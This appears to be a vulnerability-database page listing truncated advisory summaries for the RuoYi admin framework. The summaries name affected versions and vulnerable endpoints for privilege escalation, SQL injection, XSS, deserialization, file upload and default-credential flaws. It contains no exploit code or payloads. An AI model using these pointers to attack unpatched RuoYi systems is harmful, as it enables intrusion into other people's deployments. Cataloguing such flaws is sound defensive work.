📦 Ruoyi

This vulnerability in RuoYi v4.8.2 allows unauthorized attackers to modify data they shouldn't have access to due to improper access control in the update function. Any organization using the vulnerab...

A privilege escalation vulnerability in RUoYi v.4.8.0 allows remote attackers to gain administrative privileges. The cancelAuthUserAll method fails to properly validate whether the requesting user has...

A privilege escalation vulnerability in RUoYi v.4.8.0 allows remote attackers to gain elevated privileges through the /editSave method in SysNoticeController. This affects all systems running the vuln...

A privilege escalation vulnerability in RUoYi v.4.8.0 allows remote attackers to gain elevated privileges by manipulating the jobId parameter. This affects all systems running the vulnerable version o...

A privilege escalation vulnerability in RUoYi v.4.8.0 allows remote attackers to gain elevated privileges through the changeStatus method. This affects all systems running the vulnerable version of RU...

A privilege escalation vulnerability in RUoYi v.4.8.0 allows remote attackers to gain elevated privileges by exploiting improper validation of the deptId parameter in the selectDeptTree method. This a...

RuoYi v4.7.9 and earlier contains a code injection vulnerability in the code generation feature that allows attackers to escape from comments and execute arbitrary code. This affects all systems runni...

RuoYi versions up to 4.6 contain a SQL injection vulnerability in the /system/dept/edit endpoint that allows attackers to execute arbitrary SQL commands. This affects all deployments of RuoYi up to ve...

This vulnerability in RuoYi's CookieRememberMeManager allows remote attackers to escalate privileges by exploiting improper deserialization of remembered user identities. Any system running the affect...

This vulnerability in RuoYi v4.8.2 allows unauthorized attackers to bypass access controls in the selectDept function, enabling them to access sensitive department data without proper authentication. ...

Ruoyi v4.8.0 has an incorrect access control vulnerability where the authRole method in SysUserController.java lacks a checkUserDataScope permission check. This allows authenticated users to potential...

This vulnerability in Ruoyi 4.8.1 allows attackers to escalate privileges by exploiting a flaw where the owning department has higher rights than the active user. Attackers can gain unauthorized acces...

Ruoyi v4.8.0 has an incorrect access control vulnerability in the resetPwd method that allows unauthorized password resets. Attackers can reset passwords of any user account without proper permission ...

This vulnerability in RUoYi v4.8.0 allows remote attackers to escalate privileges by exploiting improper permission validation in the /edit/{dictId} endpoint. Attackers can modify data they shouldn't ...

CVE-2024-57436 is a session ID exposure vulnerability in RuoYi v4.8.0 that allows unauthorized attackers to view admin session IDs through system monitoring. This enables session hijacking where attac...

RuoYi v4.7.2 contains a CSV injection vulnerability in the admin module that allows attackers to embed malicious formulas in exported Excel log files. When victims open these .xlsx files in spreadshee...

This vulnerability allows remote attackers to execute arbitrary code on RuoYi systems up to version 4.8.1 through code injection in the /monitor/cache/getnames endpoint. Attackers can exploit this wit...

RuoYi versions 4.8.1 and earlier contain a stored cross-site scripting (XSS) vulnerability in the menu editing endpoint. Attackers with menu modification permissions can inject malicious scripts that ...

This vulnerability in yangzongzhuan RuoYi up to version 4.8.1 allows attackers to bypass authorization controls by manipulating the userIds parameter in the /system/role/authUser/selectAll endpoint. A...

This SQL injection vulnerability in RuoYi's blacklist handler allows attackers to execute arbitrary SQL commands on affected systems. It affects RuoYi versions up to 4.8.1 and can be exploited remotel...

This vulnerability in RuoYi up to version 4.8.1 involves the use of default credentials in the Druid component configuration file. Attackers can remotely exploit this to gain unauthorized access to th...

This critical vulnerability in RuoYi allows attackers to upload arbitrary files without restrictions via the uploadFile function. Remote attackers can exploit this to upload malicious files like web s...

This vulnerability in RuoYi's Image Source Handler allows attackers to bypass UI layer restrictions, potentially enabling unauthorized interface manipulation. It affects RuoYi versions up to 4.8.1 and...

This vulnerability allows attackers to inject malicious scripts via the configUrl parameter in Swagger UI within RuoYi systems. When exploited, it enables cross-site scripting attacks that can steal s...

A privilege escalation vulnerability in RUoYi v.4.8.0 allows remote attackers to gain elevated privileges by manipulating the menuId parameter. This affects systems running the vulnerable version of R...

RuoYi v4.8.0 contains a SQL injection vulnerability in the orderby parameter at the /monitor/online/list endpoint. This allows attackers to execute arbitrary SQL commands on the database. Organization...

This vulnerability in RuoYi v4.8.0 allows administrators to cause a Denial of Service (DoS) by duplicating login names during password resets. The attack requires admin privileges and affects systems ...

This vulnerability in RuoYi up to version 4.8.0 allows remote attackers to execute arbitrary code through deserialization in the getBeanName function of the Whitelist component. Attackers can exploit ...

This cross-site scripting (XSS) vulnerability in Ruoyi's code generation tool allows attackers to inject malicious scripts via the sql parameter. When exploited, it enables session hijacking, credenti...